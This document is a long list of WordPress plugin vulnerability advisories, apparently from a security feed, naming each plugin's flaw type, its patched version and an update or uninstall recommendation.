Plugin: WP OAuth Server (OAuth Authentication)

Vulnerability: Pseudorandom Number Generation
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Lets-Box

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.15.3
Recommended Action: Update to version 1.15.3, or a newer patched version

Plugin: Smart WooCommerce Search

Vulnerability: Missing Authorization
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: WP Symposium

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 15.9
Recommended Action: Update to version 15.9, or a newer patched version

Plugin: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC)

Vulnerability: SQL Injection
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: WA Form Builder

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce Warranty Requests

Vulnerability: Missing Authorization
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 21.4
Recommended Action: Update to version 21.4, or a newer patched version

Plugin: wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.28
Recommended Action: Update to version 2.1.28, or a newer patched version

Plugin: Simple SEO

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7.92
Recommended Action: Update to version 1.7.92, or a newer patched version

Plugin: Rencontre – Dating Site

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 3.11
Recommended Action: Update to version 3.11, or a newer patched version

Plugin: DMCA WaterMarker

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Cross-Site Request Forgery to Local File Inclusion
Patched Version: 1.13.5
Recommended Action: Update to version 1.13.5, or a newer patched version

Plugin: wordpress vertical image slider plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.17
Recommended Action: Update to version 1.2.17, or a newer patched version

Plugin: Client Invoicing by Sprout Invoices – Easy Estimates and Invoices for WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 19.9.7
Recommended Action: Update to version 19.9.7, or a newer patched version

Plugin: Contact Form 7 – Dynamic Text Extension

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: Insecure Direct Object Reference
Patched Version: 7.1.0
Recommended Action: Update to version 7.1.0, or a newer patched version

Plugin: Redirect 404 Error Page to Homepage or Custom Page with Logs

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: Formilla Edge Targeted Messaging Platform for Sales and Marketing

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting via ‘FormillaPluginID’
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Missing Authorization in migrateProductOnlyToCommon function
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Frontend Uploader

Vulnerability: Cross-Site Scripting
Patched Version: 0.9.4
Recommended Action: Update to version 0.9.4, or a newer patched version

Plugin: Count per Day

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.6
Recommended Action: Update to version 3.2.6, or a newer patched version

Plugin: Open Graph Metabox

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP smart CRM & Invoices FREE

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting via datef
Patched Version: 1.3.2.1
Recommended Action: Update to version 1.3.2.1, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Authenticated SQL Injection
Patched Version: 7.0.3
Recommended Action: Update to version 7.0.3, or a newer patched version

Plugin: User Activity

Vulnerability: IP Address Spoofing
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Yoo Slider – Image Slider & Video Slider

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: BuddyPress

Vulnerability: 2.7.3
Patched Version: 2.7.4
Recommended Action: Update to version 2.7.4, or a newer patched version

Plugin: Popup Box – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.8.7
Recommended Action: Update to version 3.8.7, or a newer patched version

Plugin: Weberino Timed Quiz

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quote-O-Matic

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Order Export For WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: WP Roles at Registration

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Smooth Page Scroll Up/Down Buttons

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: MAZ Loader – Preloader Builder for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: WP Mobile Detector

Vulnerability: Arbitrary File Upload
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: Orders Tracking for WooCommerce

Vulnerability: Authenticated (Administrator+) Directory Traversal via ‘file_url’
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Clever Addons for Elementor

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: CAOS | Host Google Analytics Locally

Vulnerability: Admin+ Arbitrary Folder Deletion via Path Traversal
Patched Version: 4.1.9
Recommended Action: Update to version 4.1.9, or a newer patched version

Plugin: WordPress Online Booking and Scheduling Plugin – Bookly

Vulnerability: Arbitrary File Deletion
Patched Version: 21.8
Recommended Action: Update to version 21.8, or a newer patched version

Plugin: Patreon WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Posts in Page

Vulnerability: Authenticated Directory Traversal leading to Local File Inclusion
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Login With Ajax – Fast Logins, 2FA, Redirects

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: optinfirex

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Insecure Direct Object Reference to (Subscriber+) Ticket Export
Patched Version: 6.1.2
Recommended Action: Update to version 6.1.2, or a newer patched version

Plugin: User Submitted Posts – Enable Users to Submit Posts from the Front End

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 20190426
Recommended Action: Update to version 20190426, or a newer patched version

Plugin: SoundPress Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Events Made Easy

Vulnerability: Missing Authorization
Patched Version: 2.3.17
Recommended Action: Update to version 2.3.17, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: Magic Fields

Vulnerability: Cross-Site Scripting via RCCWP_CreateCustomFieldPage.php custom-field-css parameter
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Google Doc Embedder

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: Manage Notification E-mails

Vulnerability: Cross-Site Request Forgery to Plugin Options Update
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX

Vulnerability: Gutenberg Post Grid Blocks <= 3.0.5
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.66
Recommended Action: Update to version 1.1.66, or a newer patched version

Plugin: Image Source Control Lite – Show Image Credits and Captions

Vulnerability: Insecure Direct Object Reference
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WP Bing Map Pro

Vulnerability: Cross-Site Request Forgery via AJAX actions
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: Responsive Menu – Create Mobile-Friendly Menu

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: W4 Post List

Vulnerability: Information Disclosure via post_excerpt
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Export All URLs

Vulnerability: Cross-Site Request Forgery to Sensitive Data Export
Patched Version: 4.3
Recommended Action: Update to version 4.3, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Unauthenticated SQL Injection via qc_wpbo_search_response
Patched Version: 4.9.1
Recommended Action: Update to version 4.9.1, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Scripting via begin_date, end_date, or form_id Parameter
Patched Version: 3.3.18
Recommended Action: Update to version 3.3.18, or a newer patched version

Plugin: Spiffy Calendar

Vulnerability: Reflected Cross-Site Scripting via page parameter
Patched Version: 4.9.4
Recommended Action: Update to version 4.9.4, or a newer patched version

Plugin: WP FuneralPress

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Gantry 4 Framework

Vulnerability: Remote Code Execution
Patched Version: 4.1.4
Recommended Action: Update to version 4.1.4, or a newer patched version

Plugin: WPcalc – create any online calculators

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FoxyShop

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.8.2
Recommended Action: Update to version 4.8.2, or a newer patched version

Plugin: Advanced Database Cleaner

Vulnerability: Cross-Site Request Forgery via aDBc_save_settings_callback
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.0.10
Recommended Action: Update to version 2.0.10, or a newer patched version

Plugin: Leads and Visitor Insights

Vulnerability: Unauthenticated Arbitrary License Change
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Login as User or Customer

Vulnerability: Authentication Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HT Politic – For Political WordPress Themes / Website

Vulnerability: Cross-Site Request Forgery leading to Arbitrary Plugin Activation
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: WP Inventory Manager

Vulnerability: Reflected Cross-Site Scripting via ‘message’
Patched Version: 2.1.0.13
Recommended Action: Update to version 2.1.0.13, or a newer patched version

Plugin: QR Twitter Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: About Author Box

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 1.5.23
Recommended Action: Update to version 1.5.23, or a newer patched version

Plugin: WP Custom Pages

Vulnerability: Path Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: JVM WooCommerce Wishlist

Vulnerability: Insecure Direct Object Reference
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Limited Privilege Escalation via ‘acceptable_defined_roles’
Patched Version: 4.13.2
Recommended Action: Update to version 4.13.2, or a newer patched version

Plugin: MSMC – Redirect After Comment

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Grid Kit Premium

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 6.4.3
Recommended Action: Update to version 6.4.3, or a newer patched version

Plugin: User Access Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Not specified in this listing
Patched Version: 4.9.1
Recommended Action: Update to one of the following versions, or a newer patched version: 4.9.1, 4.9.3

Plugin: Contact Form by Supsystic

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.15
Recommended Action: Update to version 1.7.15, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 1.2.11
Recommended Action: Update to version 1.2.11, or a newer patched version

Plugin: FluentAuth – The Ultimate Authorization & Security Plugin for WordPress

Vulnerability: IP Spoofing to Protection Mechanism Bypass
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: BigContact Contact Page

Vulnerability: Authenticated SQL Injection
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Redux Framework

Vulnerability: Missing Authorization to Sensitive Information Disclosure
Patched Version: 4.2.13
Recommended Action: Update to version 4.2.13, or a newer patched version

Plugin: Stockists Manager for Woocommerce

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPQA – Builder forms Addon For WordPress

Vulnerability: Not specified in this listing (affected versions: <= 5.3)
Patched Version: 5.4
Recommended Action: Update to version 5.4, or a newer patched version

Plugin: Float menu – awesome floating side menu

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.0.3
Recommended Action: Update to version 5.0.3, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.31
Recommended Action: Update to version 1.31, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated (Contributor+) Arbitrary File Upload to Remote Code Execution via Template Import
Patched Version: 3.18.2
Recommended Action: Update to version 3.18.2, or a newer patched version

Plugin: Post List With Featured Image

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Stylish Cost Calculator

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 7.9.0
Recommended Action: Update to version 7.9.0, or a newer patched version

Plugin: Smart Email Alerts

Vulnerability: Not specified in this listing
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Affiliate Platform

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.4.0
Recommended Action: Update to version 6.4.0, or a newer patched version

Plugin: Art Decoration Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Unauthenticated Information Disclosure
Patched Version: 1.8.13
Recommended Action: Update to version 1.8.13, or a newer patched version

Plugin: Side Menu Lite – add sticky fixed buttons

Vulnerability: SQL Injection
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Mail Masta

Vulnerability: SQL Injection via id parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Multi-page Toolkit

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Download Shortcode

Vulnerability: Directory Traversal
Patched Version: 1.0
Recommended Action: Update to version 1.0, or a newer patched version

Plugin: CoolClock – a Javascript Analog Clock

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.3.5
Recommended Action: Update to version 4.3.5, or a newer patched version

Plugin: Slideshow, Image Slider by 2J

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate WordPress Auction Plugin

Vulnerability: Cross-Site Request Forgery and Cross-Site Scripting
Patched Version: 4.0.6
Recommended Action: Update to version 4.0.6, or a newer patched version

Plugin: Guest posting / Frontend Posting wordpress plugin – WP Front User Submit / Front Editor

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 3.8.5
Recommended Action: Update to version 3.8.5, or a newer patched version

Plugin: WooCommerce Advanced Bulk Edit Products, Orders, Coupons, Any WordPress Post Type – Smart Manager

Vulnerability: Not specified in this listing (affected versions: <= 8.27.0)
Patched Version: 8.28.0
Recommended Action: Update to version 8.28.0, or a newer patched version

Plugin: MainWP Rocket Extension

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: Favorites

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: Homepage Product Organizer for WooCommerce

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Authenticated SQL Injection via Shortcode
Patched Version: 7.1.12
Recommended Action: Update to version 7.1.12, or a newer patched version

Plugin: WordPress Flipbook by Supsystic

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More

Vulnerability: Unauthorized Access to Information Disclosure
Patched Version: 1.5.14
Recommended Action: Update to version 1.5.14, or a newer patched version

Plugin: Subscribe To Comments Reloaded

Vulnerability: Cross-Site Request Forgery
Patched Version: 220502
Recommended Action: Update to version 220502, or a newer patched version

Plugin: WP-Ban

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.69.1
Recommended Action: Update to version 1.69.1, or a newer patched version

Plugin: Events Rich Snippets for Google

Vulnerability: Cross-Site Request Forgery to Arbitrary Options Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PostmagThemes Demo Import

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: WP Full Auto Tags Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Chat Bee

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Api2Cart Bridge Connector

Vulnerability: Arbitrary File Upload
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Core: WordPress

Vulnerability: Full Path Disclosure
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: WP Job Board

Vulnerability: SQL Injection
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: GraceMedia Media Player

Vulnerability: Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ShopLentor – WooCommerce Builder for Elementor & Gutenberg +17 Modules – All in One Solution (formerly WooLentor)

Vulnerability: Cross-Site Request Forgery via process_data
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: Easiest Funnel Builder For WordPress & WooCommerce by WPFunnels

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.17
Recommended Action: Update to version 2.7.17, or a newer patched version

Plugin: Sermon'e – Sermons Online

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Snap App

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce Dynamic Pricing and Discounts

Vulnerability: Unauthenticated Settings Import/Export
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.0.7
Recommended Action: Update to version 8.0.7, or a newer patched version

Plugin: Simple Staff List

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: WCFM Marketplace – Multivendor Marketplace for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.5.0
Recommended Action: Update to version 3.5.0, or a newer patched version

Plugin: Site Reviews

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 6.7.1
Recommended Action: Update to version 6.7.1, or a newer patched version

Plugin: Hubbub Lite – Fast, Reliable Social Sharing Buttons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: NextGen Cu3er Gallery

Vulnerability: Multiple Full Path Disclosures
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP eCommerce

Vulnerability: SQL Injection
Patched Version: 3.8.9.1
Recommended Action: Update to version 3.8.9.1, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 8.1.14
Recommended Action: Update to version 8.1.14, or a newer patched version

Plugin: WP-UserOnline

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.88.1
Recommended Action: Update to version 2.88.1, or a newer patched version

Plugin: Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.9.16
Recommended Action: Update to version 6.9.16, or a newer patched version

Plugin: WC Fields Factory

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Admin Pack by SITE CASEIRO

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social LikeBox & Feed

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 2.8.5
Recommended Action: Update to version 2.8.5, or a newer patched version

Plugin: WP Cumulus

Vulnerability: Cross-Site Scripting
Patched Version: 1.22
Recommended Action: Update to version 1.22, or a newer patched version

Plugin: Blog-in-Blog

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Injection Guard

Vulnerability: Missing Authorization via ig_update
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: W-DALIL

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Calculated Fields Form

Vulnerability: Cross-Site Request Forgery to SQL Injection
Patched Version: 1.0.12
Recommended Action: Update to version 1.0.12, or a newer patched version

Plugin: Fast & Effective Popups & Lead-Generation for WordPress – HollerBox

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: WordPress Countdown Widget

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.1.9.3
Recommended Action: Update to version 3.1.9.3, or a newer patched version

Plugin: RLSWordPressSearch

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Ultimate Recipe

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.12.7
Recommended Action: Update to version 3.12.7, or a newer patched version

Plugin: Top 10 – WordPress Popular posts by WebberZone

Vulnerability: Cross-Site Request Forgery via tptn_ajax_clearcache
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Community Lite Video Chat

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Integration for Constant Contact and Contact Form 7, WPForms, Elementor, Ninja Forms

Vulnerability: Open Redirect
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Clock In Portal- Staff & Attendance Management

Vulnerability: Cross-Site Request Forgery to Holidays Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Mail Logging

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Slider – Ultimate Responsive Image Slider

Vulnerability: Missing Authorization via AJAX action
Patched Version: 3.5.12
Recommended Action: Update to version 3.5.12, or a newer patched version

Plugin: Custom Permalinks

Vulnerability: Authenticated SQL Injection
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

